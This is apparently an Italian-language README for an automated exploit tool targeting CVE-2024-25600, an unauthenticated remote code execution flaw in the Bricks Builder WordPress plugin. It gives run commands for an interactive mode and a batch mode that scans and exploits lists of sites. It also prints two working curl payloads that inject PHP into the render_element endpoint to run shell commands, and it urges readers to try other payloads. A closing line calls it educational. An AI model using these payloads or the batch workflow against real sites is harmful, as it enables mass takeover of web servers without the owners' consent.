
Strumento di exploit automatizzato per CVE-2024-25600, che consente esecuzione remota di codice non autenticata su siti WordPress usando il plugin Bricks Builder. Supporta modalità interattiva e batch per l'esecuzione di comandi.
Questo strumento 🛠️ è progettato per sfruttare la vulnerabilità CVE-2024-25600 🕳️ presente nel plugin Bricks Builder per WordPress. La vulnerabilità consente l'esecuzione remota di codice non autenticata sui siti web interessati 💻. Lo strumento automatizza il processo di sfruttamento recuperando i nonce e inviando richieste appositamente crafted per eseguire comandi arbitrari.
git clone.pip install -r requirements.txt.python exploit.py -u <URL> per avviare la modalità interattiva.python exploit.py -l <file_path> per scansionare e sfruttare i siti elencati.La PoC di base fornita dalla divulgazione è la seguente:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Aggiornamento: Seconda PoC (più affidabile)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
È possibile che payload aggiuntivi possano produrre risultati migliori. Se il mio exploit o la mia prova di concetto non funzionano per te, ti incoraggio a sperimentare con payload alternativi per trovare una soluzione più efficace.
Sostituisci [HOST] con il sito web target e [NONCE] con il valore del nonce recuperato dal sito.
Per maggiori informazioni sulla vulnerabilità CVE-2024-25600, fai riferimento alla divulgazione dettagliata su Snicco.io.
Le informazioni fornite in questo README sono solo a scopo educativo. L'hacking non autorizzato di siti web o reti è illegale e non etico. 🚫
Un ringraziamento ai ricercatori di sicurezza che hanno scoperto e segnalato questa vulnerabilità, fornendo alla comunità informazioni e strumenti per aiutare a proteggere le proprie applicazioni web.